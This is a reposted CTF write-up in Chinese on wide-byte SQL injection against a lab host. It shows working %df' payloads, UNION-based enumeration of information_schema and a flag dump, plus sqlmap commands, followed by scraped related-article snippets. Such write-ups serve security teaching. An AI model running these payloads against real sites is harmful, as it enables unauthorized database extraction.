2. 程式人生 > >有趣的注入(寬位元組注入)

有趣的注入(寬位元組注入)

阿新 發佈:2019-01-03

ctf:有趣的注入

(一)手注:

url:http://ctf.cdusec.org:8086/sqli.php?id=1
實驗工具:火狐hackbar
x001:
輸入:” ‘ “單引號無反應,再輸入" %df’ "(寬位元組注入,顯示報錯。)
截圖:
在這裡插入圖片描述
在這裡插入圖片描述
x002判斷列數:判斷出來有3列。
http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 2 -- +

 http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 4 -- +

x003判斷注入點:

http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,3 -- +

在這裡插入圖片描述
x003:查詢table

http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- +

在這裡插入圖片描述
x004:查詢columns。
子查詢:
使用單引號,雙引號等被註釋掉,最後用子查詢查到。culumns

http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,4))--+

在這裡插入圖片描述
x005:查詢dump

http://ctf.cdusec.org:8086/sqli.php?id=-1%df' union select 1,2,flag from flag--+

在這裡插入圖片描述
x005:
flag:

flag{Just_4_b4by_SQLi}

(二)slqmap跑:
x001:dbs

sqlmap -u "http://ctf.cdusec.org:8086/sqli.php?id=1%df%27" -p"id" --dbs

x002:tables

sqlmap -u "http://ctf.cdusec.org:8086/sqli.php?id=1%df%27" -p"id" -D news --tables

x004:dump

sqlmap -u "http://ctf.cdusec.org:8086/sqli.php?id=1%df%27" -p"id" -D news -T flag --dump

相關推薦

有趣注入位元組注入

ctf:有趣的注入 (一)手注: url:http://ctf.cdusec.org:8086/sqli.php?id=1 實驗工具:火狐hackbar x001: 輸入:” ‘ “單引號無反應,再輸入" %df’ "(寬位元組注入,顯示報錯。) 截圖: x002判斷列數:判斷出

sql注入位元組注入

Bugku上看到一道這方面的題,從網上看了不少資料,談一談自己的認識。                      當我們在位址列輸入單引號時頁面並沒有報錯,         說明單引號應該被過濾了,轉義為 \'  防止注入                 

SQL注入教程——位元組注入

前言 在mysql中,用於轉義(即在字串中的符號前加上”\”)的函式有addslashes,mysql_real_escape_string,mysql_escape_string等,還有一種情況是magic_quote_gpc,不過高版本的PHP將去除這個特

(學習)SQL注入--位元組注入

SQL注入–寬位元組注入 實踐: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1 頁面顯示: 顯然執行的查詢語句是: select id,title from news where id = '1' 其

Spring依賴注入構造引數注入、集合,陣列屬性注入、XML自動注入 ,全註解配置

依賴注入 構造引數注入        --> 常用的是方案一和方案二         MyBean類  YouBean類 <?xml version="1.0" encodin

史上最簡單SpringBoot @Bean & @Qualifier 注入零 XML 注入

首先,Create 一個名叫 ApplicationConfig 的類: —> 1、用 @Configuration 註解上 —> 2、繼承 WebMvcConfigurerAdapter (零 XML 注入) —> 3、定義一個方法用 @Be

Sql 注入詳解:位元組注入+二次注入

sql注入漏洞 原理:由於開發者在編寫操作資料庫程式碼時,直接將外部可控引數拼接到sql 語句中,沒有經過任何過濾就直接放入到資料庫引擎中執行了。 攻擊方式: (1) 許可權較大時,直接寫入webshell 或者直接執行系統命令 (2) 許可權較小時,通過注入獲得管理

tp5依賴注入自動例項化:解決了像類中的方法傳物件的問題

app\index\Demo1.php namespace app\index\controller; /* 容器與依賴注入的原理 ----------------------------- 1.任何的url訪問,最終都是定位到控制器,由控制器中某換個具體方法去執行 2.一個控制器對應著一個類,如果這些

位元組注入例項

我們看一下html原始碼 看到編碼變化了 所以是寬位元組注入 所以我們要用%df來代替一個位元組 頁面正確 加個單引號頁面報錯 頁面報錯 存在注入 http://103.238.227.13:10083/?id=1%df' orde

深入探究位元組注入漏洞與修補原理

 0、前言 最近要為了自動化審計蒐集所有PHP漏洞,在整理注入的時候,發現寬位元組注入中使用iconv造成的漏洞原理沒有真正搞懂,網上的文章也說得不是很清楚,於是看了榮哥(lxsec)以前發的一篇

JS防止指令碼注入替換特殊字元

htmlEncode: (function() { var entities = { '&': '&', '>': '>', '<': '<',

對於位元組注入字元的一些問題以及理解

   首先%df是url編碼形成的,查詢資料url編碼其實是ascii編碼的16進製表示,在前面加了一個%號,而對照ascii碼錶發現127號是%7F,中文的ascii碼是大於128,所以只要輸入的編碼ascii大小是大於128的,是可以測試成功的,比如說用%8F 這裡

[轉載]sql位元組注入詳解

儘管現在呼籲所有的程式都使用unicode編碼,所有的網站都使用utf-8編碼,來一個統一的國際規範。但仍然有很多,包括國內及國外(特別是非英語國家)的一些cms,仍然使用著自己國家的一套編碼,比如gbk,作為自己預設的編碼型別。也有一些cms為了考慮老使用者,所以出了gbk

sqli-labs————位元組注入(可以用於繞過濾了單引號或者\的WAF)

寬位元組注入的原理:原理:mysql在使用GBK編碼的時候,會認為兩個字元為一個漢字,例如%aa%5c就是一個漢字(前一個ascii碼大於128才能到漢字的範圍)。我們在過濾 ' 的時候,往往利用的思路

spring實現靜態注入類或者屬性

spring實現靜態注入(類或者屬性) 場景是:工具類一般都是靜態方法,靜態方法只能訪問靜態屬性。所以,我們需要靜態注入類或者屬性

LeetCode 無重複字元的最長子串探索位元組跳動

題目描述   給定一個字串,請你找出其中不含有重複字元的 最長子串 的長度。 示例 1: 輸入: "abcabcbb" 輸出: 3 解釋: 因為無重複字元的最長子串是 "abc",所以其長度為 3。 示例 2: 輸入: "bbbbb" 輸出

LeetCode 最長公共字首探索位元組跳動

題目描述   編寫一個函式來查詢字串陣列中的最長公共字首。 如果不存在公共字首,返回空字串 ""。 示例 1: 輸入: ["flower","flow","flight"] 輸出: "fl" 示例 2: 輸入: ["dog","racec

POJ-3414-兩個杯子倒水問題搜+回溯

Northeastern Europe 2002, Western Subregion 題意: 給出兩個容積分別為 a 和 b 的pot,按照以下三種操作方式,求出能否在一定步數後,使者兩個pot的其中一個的水量為c。 1.FILL(i):將ipot倒滿水。 2.DROP(i):將ip

arduino 根據引腳電平與Zigbee連結控制繼電器通斷32位元組處理

#include <string.h> #include <stdint.h> char buffer1 [32]; char x = '0'; int key = 0; void setup() {   // put your setup code

JAVASE基礎-day20IO(位元組流)

20.01_IO流(IO流概述及其分類) 1.概念 IO流用來處理裝置之間的資料傳輸 Java對資料的操作是通過流的方式 Java用於操作流的類都在IO包中 流按流向分為兩種:輸入流,輸出流。 流按操作型別分為兩種: 位元組流 : 位元組流可以操作任何資